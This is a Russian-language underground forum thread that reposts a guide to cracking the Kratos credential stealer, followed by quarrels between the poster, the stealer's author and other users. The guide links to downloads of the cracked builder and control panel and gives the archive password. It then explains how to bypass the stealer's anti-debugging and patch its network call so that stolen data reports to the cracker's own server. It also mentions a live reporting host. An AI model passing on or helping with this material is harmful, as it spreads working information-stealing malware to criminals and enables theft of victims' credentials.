• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

[MOLLY] Кряк v1.0 Kratos Stealer от ims0rry

MOLLY GIRL

Участник
Сообщения
23
Реакции
112
0 руб.
Telegram

Статья является копипастом.
Автор: Suffocation
Источник: https://forum.exploit.in/index.php?showtopic=139469&hl=kratos
Цель: на данный момент регистрация на Exploit закрыта, поэтому решила выложить в открытый доступ.

ims0rry, i am sorry
smile.gif


Йо йо, привет всем. С вами снова я. На этот раз вместо того, чтобы срать в топе я решил нагло спиздить его продукт. Ну, не совсем нагло, сначала я его купил.

8ipEnvI.png


Билдер + админка ( без инструкции ):
https://www.sendspace.com/file/tap1bg
пасс exploit.in

Кому нужна админка с инструкциями от автора, то качаем по этому линку. Прям как селлер предоставил: https://yadi.sk/d/Cej6h5fZ3VPP4U

Выкладываю кряк, а также как я его сделал под Kratos stealer от ims0rry

Источник - какой-то школо форум: https://darkwebs.ws/threads/39040/

Часто встречал, что его юзают. Везде слышу этот аймсорри. Решил глянуть че за аймсорри.

Продукт был приобретен у его селлера: https://forum.exploit.in/index.php?showtopic=139456

Так что админка прилагается. Все легально! А что, в условиях пользования был запрещен слив на вт, так туда я не сливал. Сливаю на эксп. Хм.
laugh.gif


Судя по логам трафика он стучит куда мы скажем, так что должно работать. Чтобы стучала налево не заметил

tFIxPrT.png


Proof of work, отстук на мой Host: security-mail.top

Кстати, автор видимо ебанат писать название продукта в User-agent. Детект одним правилом у аверов...

How to

Итак, открываем билд. Идем в импорт и там смотрим где вызывается wininet функции. Находим функцию с такими прототипами:

kocNnE1.png


Смотрим откуда она вызывается:

3Z3Rjc5.png


Пролистав вверх видим как пушится очень "неприметный" массив на стэк. Ага, ваще не палевно. Флаг в руки.

ZM0m1Cr.png


Как видим - внутри base64 строка, декодировав которую получаем адрес панели.

Выглядит в си это так:
CHAR unCrackable[] = {'b', 'l', 'a', 'b', 'l', 'a', '\0'};



Современные методы обфускации че сказать
wink.gif


Наша задача - это подменить.

Делается это тривиально не смотря на все это говно. Нам надо подменить строку, значит просто посмотрим где она юзается.

Вариант I
PZnrUGM.png


Подменить адрес base64. Вариант не очень, так как нам придется еще в бейс перегонять, да и юзаются std::string ( как мы видим дохуя аллокаторов ), из-за которой может возникнуть возня.

Вариант II
На том же месте подменить результат декода. Я хотел сделать так, и я сделал. Но почему-то вылетал Heap corruption, не стал разбираться. Так что не вариант

Вариант III
Помоему самый наглый
laugh.gif


XMH54Nm.png


Его и сделаем

ims0rry видимо не знает что такое оптимизатор и поэтому отключает его от греха подальше
laugh.gif


(это я о мусорном коде cmp ).

Это нам и поможет. Благодаря отключенному оптимизатору тут достаточно места, чтобы вписать mov ecx, адрес
laugh.gif


Для этого прыгнем туда в дебагере. Врубаем, ставим бряк на интернетопен и хуярим. Попадаем на анти-дебаг ( который в последствии будем юзать для хранения адреса панели
laugh.gif
)

Анти-дебаг прямиком из 90-х. Инлайним IsDebuggerPresent в надежде, что реверсер испугается и съебется. Ага.

L8GERTM.png


Тупо вводим dbh в cmd x64dbg, он патчит PEB и ставит туда 0. Ims0rry, i am sorry за такое.

Видим внизу куча mov. Занопим их.

nVtXhxQ.png


Видим кстати также стеб от ims0rry. Это говорит о том насколько чтение пеба он считает продвинутой техникой
laugh.gif


Зашибись, теперь патчим вызов InternetConnect, чтобы адрес оно брало из занопленного анти-дебаг кода
biggrin.gif


Чтобы выглядело так:
On6ijOu.png


Это кстати дебаг уже пропатченного бинаря. Видим 123.123.123.123 в стеке. Туда и отстучит
smile.gif


fMCTqrg.png


Осталось написать билдер и вместо nop писать то что нам надо.

Посмотрим файловый оффсет до нопов.

hRYte8g.png


Спишем его, перегоним в хидер стаб и сделаем патчер:

nMk3i9X.png


Объяснений, надеюсь, не надо


Спасибо всем за внимание! С вами был suffocation. И еще повторю: ims0rry, i am sorry! Уж очень понравится слоган
biggrin.gif


P.S. Если захотите повторить не забудьте в хидерах отключить динамик базу

Источник: https://forum.exploit.in/index.php?showtopic=139469&hl=kratos
Цель: на данный момент регистрация на Exploit закрыта, поэтому решила выложить в открытый доступ.
 

ims0rry

Omae wa mou shindeiru

ims0rry

Omae wa mou shindeiru
Местный
Сообщения
119
Реакции
679
0 руб.
Jabber
Please note, if you want to make a deal with this user, that it is blocked.
Он напшет, что вышла обнова и т.д., но с обновой шибко нечего и не изменилось. Основной функционал остался)
Да ладно?) А ты ченжлог погляди, может, все-таки, изменилось?)
DsYg6La.png
LYlbeum.png
Эта версия давно устарела + удачи вам на нее инсталлы лить :)
 

MOLLY GIRL

Участник
Сообщения
23
Реакции
112
0 руб.
Telegram
Обожаю, когда авторы пытаються сказать всем юзерам, что вот вышла обнова, а этот слив говно-говно =)
На данный момент есть множество продажников стиллера от других кодеров, а этот кряк без проблем может с ним посоперничать.
 

ims0rry

Omae wa mou shindeiru

ims0rry

Omae wa mou shindeiru
Местный
Сообщения
119
Реакции
679
0 руб.
Jabber
Please note, if you want to make a deal with this user, that it is blocked.
Обожаю, когда авторы пытаються сказать всем юзерам, что вот вышла обнова, а этот слив говно-говно =)
Так это факт. Кряк вышел 12 мая, с тех поры вышло 2 обновления, которые полностью затронули модуль работы с браузерами и граббером. Также, были мелкие багфиксы, которые фиксили отстук на некоторых машинах, но, окей, это можно не брать в рассчет.
На данный момент есть множество продажников стиллера от других кодеров, а этот кряк без проблем может с ним посоперничать.
Учитывая что это "множество" сделано на сорцах .net nofile :)
Ах да, он же тоже мой.
 

MOLLY GIRL

Участник
Сообщения
23
Реакции
112
0 руб.
Telegram
Так это факт. Кряк вышел 12 мая, с тех поры вышло 2 обновления, которые полностью затронули модуль работы с браузерами и граббером.
Начнем с того, что данный продукт продавался, значит был вполне работоспособным. Нет придела совершенству, поэтому как то сра на то, что там было заменено. Негативных отзывов нету, значит на общую картину ничего не повлияло.

Учитывая что это "множество" сделано на сорцах .net nofile :)
Ах да, он же тоже мой.
Фу, зачем ты вообще его приплетаешь? Я же не пишу про Eredel , который написан на сорцах Kraen (C#). Или про остальные говно-шарпо продажники..
Твой софт написан на С++, поэтому я затрагиваю только тот софт который написан на С++ или других языках которые нельзя зареверсить "оычными способами".
Да и зачем ты смотришь только на русс форумы? Бери забугор, там есть достойный софт, который с легкостью может покрыть данный слив.
 

ims0rry

Omae wa mou shindeiru

ims0rry

Omae wa mou shindeiru
Местный
Сообщения
119
Реакции
679
0 руб.
Jabber
Please note, if you want to make a deal with this user, that it is blocked.
Начнем с того, что данный продукт продавался, значит был вполне работоспособным. Нет придела совершенству, поэтому как то сра на то, что там было заменено. Негативных отзывов нету, значит на общую картину ничего не повлияло.
Кряк != лицензия. Как демо-версия может и сойдет, но не более.
Фу, зачем ты вообще его приплетаешь? Я же не пишу про Eredel , который написан на сорцах Kraen (C#). Или про остальные говно-шарпо продажники..
Я, конечно, очень извиняюсь, но Kraens написан на C++.
Твой софт написан на С++, поэтому я затрагиваю только тот софт который написан на С++ или других языках которые нельзя зареверсить "оычными способами".
Не ты затрагиваешь, а Suffocation, от тебя я кроме замены текста в нотпаде ничего не видел :D
Да и зачем ты смотришь только на русс форумы? Бери забугор, там есть достойный софт, который с легкостью может покрыть данный слив.
Там все еще хуже. Как бы это ни звучало.
 

MOLLY GIRL

Участник
Сообщения
23
Реакции
112
0 руб.
Telegram
Кряк != лицензия. Как демо-версия может и сойдет, но не более.

Я, конечно, очень извиняюсь, но Kraens написан на C++.

Не ты затрагиваешь, а Suffocation, от тебя я кроме замены текста в нотпаде ничего не видел :D

Там все еще хуже. Как бы это ни звучало.
Ну уж сори, исходники я не смотрела, все только на слуху.

Ну а как по другому? Или мне нужно было все по умному расписать? Чем легче, тем лучше, можно позволить себе опуститься до нотепада =)

В итоге что могу сказать? Предела совершенства нету, поэтому с выходом обновы старая версия автоматически становится "говном".
Кто купит - флаг в руки, у кого нету денег - могут пользоваться рабочей "демо" версией.
 

MOCKBA

Резидент
Сообщения
190
Реакции
192
0 руб.
Skype
Telegram
Вы двое глумитесь, придавая больше хайпа? Или серьёзно разругались? )))
 

Eredel

хаакер блин

Eredel

хаакер блин
Участник
Сообщения
3
Реакции
15
0 руб.
Telegram
Фу, зачем ты вообще его приплетаешь? Я же не пишу про Eredel , который написан на сорцах Kraen (C#). Или про остальные говно-шарпо продажники..

Пишешь хуйню, даже не понимая того, что ты не осилишь и хелло ворда на шарпе, учитывая редактирования строк ехе через нотепад и HEX редактор
Пиздец ору, шарп в нормальный руках(не в твоих к сожалению), очень мощный яп.
Не говори так о продукте, не зная даже как он работает и функционирует, ведь такого типа софт ты не напишешь никогда.
Жду взлома Eredel через HEX, клоунша :roflaneblo:
 

0x6F

Новичок
Сообщения
2
Реакции
0
0 руб.
Telegram
Пишешь хуйню, даже не понимая того, что ты не осилишь и хелло ворда на шарпе, учитывая редактирования строк ехе через нотепад и HEX редактор
Пиздец ору, шарп в нормальный руках(не в твоих к сожалению), очень мощный яп.
Не говори так о продукте, не зная даже как он работает и функционирует, ведь такого типа софт ты не напишешь никогда.
Жду взлома Eredel через HEX, клоунша :roflaneblo:
Жаль что джон обещал не ломать твой софт:(
 

MOLLY GIRL

Участник
Сообщения
23
Реакции
112
0 руб.
Telegram
Пишешь хуйню, даже не понимая того, что ты не осилишь и хелло ворда на шарпе, учитывая редактирования строк ехе через нотепад и HEX редактор
Пиздец ору, шарп в нормальный руках(не в твоих к сожалению), очень мощный яп.
Не говори так о продукте, не зная даже как он работает и функционирует, ведь такого типа софт ты не напишешь никогда.
Жду взлома Eredel через HEX, клоунша :roflaneblo:
Через что хочу, через то и ломаю. Зачем все усложнять, если достаточно было обычного NEX? Или мне нужно было строгать красивую админку, где можно было в два щелчка сделать себе билд? Это моё дело, как хочу, так и делаю.

Не говори так о продукте, не зная даже как он работает и функционирует
- Не говори о человеке то, чего не знаешь.
 

Deleted member 55782

Guest
D

Deleted member 55782

Guest
Цель: на данный момент регистрация на Exploit закрыта, поэтому решила выложить в открытый доступ.

Ты совсем поехавшая?)
1) "на данный момент регистрация на Exploit закрыта" - деффка вам врет.
upload_2018-6-3_9-32-53.png
Закрытая площадка != закрытой регистрации.

2) "поэтому решила выложить в открытый доступ" - деффка вам врет.
upload_2018-6-3_9-35-54.png

Как ты можешь заметить, я не нахожусь под своим аккаунтом, но тем не менее, у меня есть доступ к топику, знаешь, что это значит?
Статья изначально была в открытом доступе.
А публикация на vlmi сделана исключительно ради поддержания своего образа Hakс Girl и набора лайков.
 
Последнее редактирование модератором:

MOLLY GIRL

Участник
Сообщения
23
Реакции
112
0 руб.
Telegram
Цель: на данный момент регистрация на Exploit закрыта, поэтому решила выложить в открытый доступ.

Ты совсем поехавшая?)
1) "на данный момент регистрация на Exploit закрыта" - деффка вам врет.
Посмотреть вложение 11844
Закрытая площадка != закрытой регистрации.

2) "поэтому решила выложить в открытый доступ" - деффка вам врет.
Посмотреть вложение 11845

Как ты можешь заметить, я не нахожусь под своим аккаунтом, но тем не менее, у меня есть доступ к топику, знаешь, что это значит?
Статья изначально была в открытом доступе.
А публикация на vlmi сделана исключительно ради поддержания своего образа Hakс Girl и набора лайков.

Ну окей, что дальше? Не нравится, что я скопипастила сюда статью? Пиши админам, пусть удалят, ведь она создана тлько для поддержания образа и заработка лайков.
Я думаю её видели малое кол-во людей, поэтому решила скопипастить сюда - это запрещается правилами? Гуляй мальчик.
 
Сверху Снизу